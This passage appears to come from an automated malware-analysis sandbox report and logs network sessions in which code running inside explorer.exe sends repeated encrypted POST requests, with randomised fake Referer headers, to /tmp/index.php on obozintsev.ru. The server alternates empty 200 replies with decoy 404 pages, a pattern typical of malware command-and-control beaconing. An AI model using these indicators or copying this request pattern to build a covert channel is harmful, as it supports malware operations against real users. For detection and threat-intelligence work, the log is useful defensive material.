                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://wdrrntcgtbyvfp.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 130
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:46.529280901 CET130OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 65 34 ce e5
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vue4`.EjpJ.z5#B-oh3
                                                                                                                        Nov 30, 2024 11:12:48.544128895 CET137INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:48 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        12192.168.2.449748189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:48.667563915 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://ehvxkgepwxtygl.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 364
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:48.667592049 CET364OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 3e 1d d8 a7
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vu>QR|LuX^x#Pu5FIB@H+JN-jC.-V:8u]x#,HRK[8j@Y#Tb
                                                                                                                        Nov 30, 2024 11:12:50.425718069 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:50 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        13192.168.2.449749189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:50.548768997 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://tejbjmlbuatgr.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 112
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:50.548789024 CET112OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 58 3b c0 9d
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuX;uYQ,wL{1X
                                                                                                                        Nov 30, 2024 11:12:52.340101957 CET137INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:52 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        14192.168.2.449750189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:52.463105917 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://otfwaojfoxegoc.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 272
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:52.463133097 CET272OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 4e 59 e2 ff
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuNYrDl^Kew*;Ws]]ONK0(^QT}x#0?Y\K_buXY}#li{hZN[s$@59
                                                                                                                        Nov 30, 2024 11:12:54.211771011 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:53 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        15192.168.2.449752189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:54.339349985 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://kqylhpxweftfa.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 358
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:54.339375019 CET358OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 6c 23 aa 92
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vul#uKFnNti@DqFJaA=ZTR,TX ]>/Fx?!B=\EPhh\HL:1"Ey$KjeJfXC2
                                                                                                                        Nov 30, 2024 11:12:56.079293966 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:55 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        16192.168.2.449754189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:56.207856894 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://fgrdwevlbrdtr.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 359
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:56.207885027 CET359OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 44 22 a1 9e
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuD"DA_dif'$<15iZpheZ-LGlLGHtA3D%q?"RF.V:,R,*aUinWGcYZ*5d
                                                                                                                        Nov 30, 2024 11:12:57.958450079 CET137INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:57 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        17192.168.2.449755189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:58.086781979 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://natewkewlwih.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 275
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:58.086811066 CET275OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 40 52 b4 80
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vu@Rqk[SOs!y^^m?:9Fx0bWCYp9C?7[l>?d&D#M3u9Ak$-^y
                                                                                                                        Nov 30, 2024 11:12:59.830614090 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:12:59 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        18192.168.2.449761189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:12:59.953778028 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://fhaalrvyqueiyk.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 135
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:12:59.953802109 CET135OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 72 4f fe fb
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vurOV)ltlA{dpd?XBwomi
                                                                                                                        Nov 30, 2024 11:13:01.802746058 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:01 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        19192.168.2.449767189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:01.925877094 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://ujchxvegkeooch.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 149
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:01.925900936 CET149OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 7f 46 be f2
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vuFD&H;MhlWGPd[=CAU/C{BeZ
                                                                                                                        Nov 30, 2024 11:13:03.676213026 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:03 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        20192.168.2.449773189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 30, 2024 11:13:03.799493074 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://pkapxutderw.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 211
                                                                                                                        Host: obozintsev.ru
                                                                                                                        Nov 30, 2024 11:13:03.799519062 CET211OUTData Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 3f 01 d8 99
                                                                                                                        Data Ascii: ;nXk"u|xycrc|@k\!rnVn? 9Yt M@NA -[k,vu?bEu}9Nq'p$9qk;Au(9c|-Pw{KP]``R(I+nr
                                                                                                                        Nov 30, 2024 11:13:05.639331102 CET484INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.26.0
                                                                                                                        Date: Sat, 30 Nov 2024 10:13:05 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        21192.168.2.449778189.163.166.52802580C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
